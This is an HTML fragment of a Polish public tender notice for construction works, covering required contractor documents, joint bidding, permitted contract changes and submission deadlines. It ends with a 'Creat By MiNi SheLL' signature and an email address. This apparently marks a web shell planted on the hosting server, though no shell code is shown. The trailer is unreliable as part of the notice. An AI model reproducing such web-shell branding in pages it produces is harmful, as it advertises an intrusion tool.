warunki<br/>udziału w postępowaniu.<br/>8.1.2. Oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia<br/>tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca<br/>powołuje się na jego zasoby, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby (art. 125 ust. 5 Pzp) – załącznik nr 2 do Rozdziału II SWZ – jeżeli dotyczy!<br/>8.1.3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych<br/>podmiotów –załącznik nr 3 do Rozdziału II SWZ – jeżeli dotyczy!<br/>8.1.4. Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie<br/>wykonania robót budowlanych przez poszczególnych wykonawców (na podstawie art. 117 ust. 4) -<br/>załącznik nr 4 do Rozdziału II SWZ – jeżeli dotyczy!<br/>8.2. Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych<br/>na dzień złożenia następujących podmiotowych środków dowodowych:<br/>8.2.4. wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty. - załącznik nr 5 do Rozdziału III SWZ (Doświadczenie zawodowe). Niniejszy<br/>wykaz musi potwierdzać spełnienie warunku, o którym mowa w pkt. 7.1.4. c) SWZ.<br/>8.2.5. wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat<br/>ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami. Wykaz osób, skierowanych przez wykonawcę do realizacji<br/>zamówienia publicznego, należy sporządzić na formularzu zgodnym z treścią załącznika nr 6 do<br/>Rozdziału III SWZ (Kwalifikacje zawodowe). Niniejszy wykaz musi zawierać dane na temat kwalifikacji<br/>wskazanych osób, potwierdzające spełnienie warunku, o którym mowa w pkt. 7.1.4. b) SWZ.<br/>8.2.6. dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej<br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia, przy zachowaniu warunku, o którym mowa w pkt. 6.1.3. SWZ. Jeżeli<br/>z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganego przez Zamawiającego<br/>podmiotowego środka dowodowego. Wykonawca składa inny podmiotowy środek dowodowy, który w<br/>wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku udziału w<br/>postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 8.10.1.	Formularz Oferta stanowiący Rozdział II SWZ wypełniony i podpisany przez osobę/-y upełnomocnioną/-e do reprezentowania Wykonawcy;<br/>8.10.2.	Pełnomocnictwo, lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, jeżeli umocowanie tej osoby nie wynika z Krajowego Rejestru Sadowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, ustanawiają oni pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego oraz załączają do oferty pełnomocnictwo poświadczające ten fakt.<br/>8.10.3.	Wspólników spółki cywilnej obowiązują przepisy dotyczące wykonawców wspólnie ubiegających się o udzielenie zamówienia, o których mowa w art. 117 ustawy Pzp. Wspólnicy spółki cywilnej wraz z ofertą złożą stosowne pełnomocnictwa oraz w przypadku wyboru oferty jako najkorzystniejszej umowę spółki cywilnej. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 8.1. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu oraz<br/>braku podstaw do wykluczenia z postępowania, do oferty należy załączyć:<br/>8.1.4. Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia w<br/>zakresie wykonania robót budowlanych przez poszczególnych wykonawców (na podstawie art.<br/>117 ust. 4) na formularzu stanowiącym załącznik nr 4 do Rozdziału II SWZ – jeżeli dotyczy!<br/>8.3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o<br/>spełnianiu warunków udziału w postępowaniu oraz niepodleganiu wykluczeniu składa każdy z<br/>Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu.<br/>W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia publicznego, podmiotowe środki dowodowe określone w pkt. 8.2.1 – 8.2.3. powinien<br/>złożyć każdy z Wykonawców oddzielnie.<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, ustanawiają oni<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego<br/>albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego<br/>oraz załączają do oferty pełnomocnictwo poświadczające ten fakt.<br/>8.10.3. Wspólników spółki cywilnej obowiązują przepisy dotyczące wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, o których mowa w art. 117 ustawy Pzp. Wspólnicy<br/>spółki cywilnej wraz z ofertą złożą stosowne pełnomocnictwa oraz w przypadku wyboru oferty<br/>jako najkorzystniejszej umowę spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana treści niniejszej umowy może nastąpić wyłącznie w granicach unormowania art. 454-<br/>455 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych, na warunkach<br/>określonych w ust. 2 niniejszego paragrafu.<br/>2. Strony zastrzegają sobie prawo zmiany postanowień Umowy w sytuacji zaistnienia jednej lub kilku<br/>z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:<br/>1) Zmiana terminu realizacji umowy:<br/>a) wykonanie zamówienia w określonym terminie nie leży w interesie Zamawiającego.<br/>b) działania siły wyższej uznanej przez Zamawiającego, poprzez wpis do dziennika budowy.<br/>Przez wystąpienie zdarzeń siły wyższej należy rozumieć zdarzenia nadzwyczajne, zewnętrzne i<br/>niemożliwe do uniknięcia nawet w przypadku maksymalnej staranności stron, uznanych przez<br/>Zamawiającego.<br/>c) gdy wystąpi konieczność wykonania robót zamiennych lub innych robót niezbędnych do<br/>wykonania przedmiotu umowy ze względu na zasady wiedzy technicznej, oraz udzielenia<br/>zamówień dodatkowych, które wstrzymują lub opóźniają realizację przedmiotu umowy,<br/>wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne<br/>podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji;<br/>d) zmiany będące następstwem działania organów administracji, w szczególności:<br/>przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji<br/>decyzji, zezwoleń, uzgodnień itp.; zmiany wydanych wcześniej przez organy administracji<br/>decyzji, zezwoleń, uzgodnień itp.; odmowa wydania przez organy administracji wymaganych<br/>decyzji, zezwoleń, uzgodnień, z przyczyn niezależnych od Wykonawcy; itp.;<br/>e) w przypadku konieczności uzyskania niemożliwych do przewidzenia na etapie planowania<br/>inwestycji zgód lub pozwoleń osób trzecich lub właściwych organów,<br/>f) jeżeli wystąpi brak możliwości wykonywania robót z powodu niedopuszczania do ich<br/>wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z<br/>przyczyn niezależnych od Wykonawcy;<br/>g) w przypadku decyzji Zamawiającego zmieniającej termin zakończenia prac związanych<br/>z okolicznościami niemającymi związku z prowadzonymi pracami, a wynikającymi z prowadzonej<br/>przez Zamawiającego działalności,<br/>h) zmiany będące następstwem okoliczności będącej po stronie Zamawiającego, a w<br/>szczególności konieczność usunięcia udokumentowanych błędów. W przypadku wystąpienia<br/>ww. okoliczności – termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas<br/>niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż<br/>okres trwania tych okoliczności,<br/>i) jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie terminu zakończenia robót<br/>będą następstwem okoliczności, za które odpowiedzialność ponosi Zamawiający, w<br/>szczególności będą następstwem nieterminowego przekazania terenu budowy,<br/>j) zmiany spowodowane niekorzystnymi warunkami atmosferycznymi w szczególności<br/>wystąpienie nietypowych dla klimatu polskiego warunków atmosferycznych odbiegających od<br/>typowych, szczególnie niesprzyjających, uniemożliwiających prowadzenie zamówień/robót<br/>budowlanych zgodnie z technologią ich wykonania, przeprowadzenie prób i sprawdzeń,<br/>dokonywanie odbiorów;<br/>Pozostałe zmiany do umowy, ze względu na ograniczoną ilość znaków w formularzu, zostały<br/>zawarte w par. 16 umowy - Rozdział V SWZ - Projektowane postanowienia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-08 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz ze wszystkimi wymaganymi oświadczeniami i dokumentami, należy złożyć za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePuap i udostępnionego również na miniPortalu: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-08 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-07</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com